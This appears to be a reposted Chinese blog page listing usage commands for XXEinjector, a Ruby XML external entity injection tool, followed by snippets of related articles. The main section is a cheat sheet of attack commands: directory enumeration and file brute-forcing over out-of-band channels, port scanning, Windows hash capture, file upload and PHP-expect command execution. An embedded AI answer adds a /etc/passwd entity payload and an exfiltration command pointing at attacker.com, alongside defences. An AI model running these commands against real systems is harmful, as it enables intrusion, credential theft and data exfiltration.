XXEInjection用法

最新推荐文章于 2025-03-31 16:00:20 发布
最新推荐文章于 2025-03-31 16:00:20 发布
阅读量445 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: ruby python php
原文链接:https://my.oschina.net/phybrain/blog/1572250

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

使用方法
列 /etc 目录 通过https:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
Enumerating /etc directory using gopher for OOB method:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
二次注入:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt 
通过http协议暴力枚举文件:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
直接枚举:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
枚举所有端口:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
获取windows hash:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
通过java的jar上传文件:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
执行系统命令使用 PHP expect:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
测试XSLT注入:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
记录请求日志:

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

转载于:https://my.oschina.net/phybrain/blog/1572250

WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1631
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
7.XXEinjector:一款功能强大的自动化XXE注射工具
weixin_30492047的博客
09-09 652
今天给大家介绍的是一款名叫XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具, 它可以使用多种直接或间接带外方法来检索文件。其中,目录枚举功能只对Java应用程序有效,而暴力破解 攻击需要使用到其他应用程序。 XXEinjector注入工具的使用 XXEinjector本身提供了非常非常丰富的操作选项,所以大家在利用XXEinjector进行渗透...
XXE工具——XXEinjection安装与使用
永远是少年
12-23 2044
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE工具——XXEinjection安装与使用。 一、XXEinjection工具介绍 二、Ruby环境安装 三、XXEinjection常用参数说明 四、XXEinjection使用示例
XXEinjector.zip
08-24
XXEinjector 一款XXE注入测试工具,可以通过命令行快速检测可能存在的XXE漏洞!
XXEinjector
weixin_34059951的博客
11-16 231
https://github.com/enjoiz/XXEinjector 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/2053838 ,如需转载请自行联系原作者 ...
XXEinjector全过程安装详细和使用教程
星语惜馨的博客
07-14 4836
xml的xxe漏洞是目前Java比较关注的,使用多种直接或间接带外方法来检索文件,目录枚举功能只对Java应用程序有效,而暴力破解攻击需要使用到其他应用程序。由于网上都是只有使用教程或者介绍功能(可能像我这样需要傻瓜式的有点少),我就收集整理详细一点。 搭建的系统:ubuntukylin-16.04-desktop-amd64(比较习惯有gui的) xxeinjector工具:https...
XEinjector:一款功能强大的自动化XXE注射工具,从零级基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
03-31 875
XXEinjector 是一款功能强大的 XXE 注入工具,可以帮助安全研究人员和渗透测试人员快速发现和利用 XXE 漏洞。但是,请务必在授权的情况下使用该工具,切勿用于非法用途!
XXE Injection笔记
Bendawang's Blog
07-05 3929
XXE Injection笔记
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
XXEinjector:一款功能强大的自动化XXE注射工具从零基础到精通,收藏这篇就够了!
Python_0011的博客
03-31 917
还在手动构造 XXE 注入 payload?OUT 啦!今天给大家安利一款,让你轻松驾驭 XXE 漏洞,成为网络安全界的弄潮儿!XXEinjector 是一款基于 Ruby 开发的 XXE 注入工具,它支持多种直接或间接的带外 (OOB) 方法来提取文件。不过要注意,目录枚举功能目前只对 Java 应用有效,而暴力破解攻击则可能需要与其他应用配合使用,才能发挥最大威力。
XXE注入攻击与防御
weixin_30565327的博客
11-28 160
在研究XXE注入攻击之前先了解一下什么是XXE 定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <...
【网络安全】web漏洞-xml外部实体注入(XXE)
ZL_1618的博客
01-06 1457
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
Xxe外部实体注入(XML External Entity Injection)
xuyunpeng3189的博客
01-23 1253
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体的注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
Jay17的博客
08-05 969
Kali 安装 Ruby环境 和 XXE神器XXEinjector 教程
初识XML------XXE漏洞
weixin_44770698的博客
06-09 675
初始XXE漏洞
[转载]XXE注入攻击与防御
weixin_33835690的博客
06-29 142
0x00 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题.在XML1.0标准⾥里,XML文档结构⾥里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导...
xxeinjector漏洞扫描
03-12
<think>好的,我现在需要回答用户关于XXEInjector漏洞扫描工具的使用说明和安全防护的问题。首先,用户提到了XXEInjector,但根据提供的引用,用户可能混淆了工具名称,因为引用中提到了XXEinjector和XXExploiter。我需要先确认正确的工具名称。根据引用[2],XXEinjector是一个提到的工具,而XXExploiter是另一个。用户可能将两者混淆了,所以需要在回答中澄清这一点。 接下来,用户想了解XXEInjector的使用方法、工作原理和防御措施。首先,我需要从引用中提取相关信息。引用[2]提到XXEinjector的使用可能有局限性,不能完全依赖,需要手动测试验证。同时,引用[2]还提到了XXExploiter工具,可以生成payload并利用,可能更优秀。因此,在回答中需要区分这两个工具,并分别说明它们的使用方法。 关于工作原理,XXE漏洞主要是因为XML解析时未禁用外部实体引用,导致攻击者可以读取文件或执行SSRF。引用[1]和[4]提到XXE漏洞的成因和攻击手段,可以引用这些内容来解释漏洞的背景。 使用说明部分,需要根据引用[2]提到的内容,说明XXEinjector的基本命令,比如指定参数如--host、--path、--proxy等。同时,需要提醒用户该工具的局限性,建议结合手动测试。对于XXExploiter,引用[2]提到它生成payload和启动服务,这部分需要详细说明步骤,如生成payload、启动HTTP服务等。 安全防护方面,引用[4]提到过滤用户提交的XML数据,禁用外部实体。需要列举具体措施,如配置XML解析器禁用DTD、使用白名单过滤输入等。同时可以引用OWASP的建议作为参考。 最后,生成相关问题,需要涵盖工具对比、防护措施、手动测试方法、结合其他工具等,确保问题有针对性。 在回答过程中,要确保使用正确的LaTeX格式,行内公式用$...$,独立公式单独成段。但根据用户的问题,可能涉及的技术内容较少使用数学公式,但如果有相关技术术语或代码,需要正确格式化。例如,在提到XML结构时,可能需要使用代码块展示示例payload。 需要检查引用是否正确对应,例如引用[2]提到XXExploiter的功能,引用[4]提到防护措施。确保每个引用标识符正确对应到用户提供的引用内容。 最后,确保回答结构清晰,分点说明使用说明、工作原理、安全防护,并生成相关问题。同时,提醒用户注意工具的限制,建议结合手动测试和其他工具,如XXExploiter。</think>### XXEInjector漏洞扫描工具使用说明与安全防护 #### 1. XXEInjector工具简介 XXEInjector(可能为XXEinjector的误写[^2])是一款自动化检测XML外部实体注入(XXE)漏洞的工具,主要用于测试XML解析器是否允许外部实体引用。其核心原理是通过构造包含恶意DTD的XML Payload,触发目标服务器解析异常,从而探测或利用漏洞。例如,典型的Payload可能包含如下结构: ```xml <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo> ``` #### 2. 工具使用说明 根据引用内容[^4],主要操作步骤如下: 1. **基本命令** ```bash ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd --proxy=http://127.0.0.1:8080 ``` - `--host`:指定攻击者控制的服务器地址,用于外带数据; - `--path`:尝试读取的目标文件路径; - `--proxy`:通过代理拦截请求以观察交互细节。 2. **场景适配** - **有回显漏洞**:直接通过响应获取文件内容; - **无回显漏洞**:利用Out-of-Band(OOB)技术,通过DNS或HTTP请求外传数据[^1]。 3. **局限性** 需注意该工具并非完全可靠,部分场景需手动调整Payload或结合其他工具(如XXExploiter)验证。 #### 3. 安全防护措施 针对XXE漏洞的防护,引用建议: 1. **禁用外部实体** 在XML解析器中设置属性(以Java为例): ```java DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); ``` 2. **输入过滤** 对用户提交的XML数据,移除`<!DOCTYPE>`和`<!ENTITY>`声明。 3. **使用白名单** 仅允许特定XML结构,并验证内容类型(如限制文件上传类型)。 #### 4. 推荐工作流程 ```mermaid graph TD A[发送含恶意DTD的XML] --> B{解析结果} B -->|有回显| C[直接提取数据] B -->|无回显| D[触发OOB请求至攻击服务器] ``` ####
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值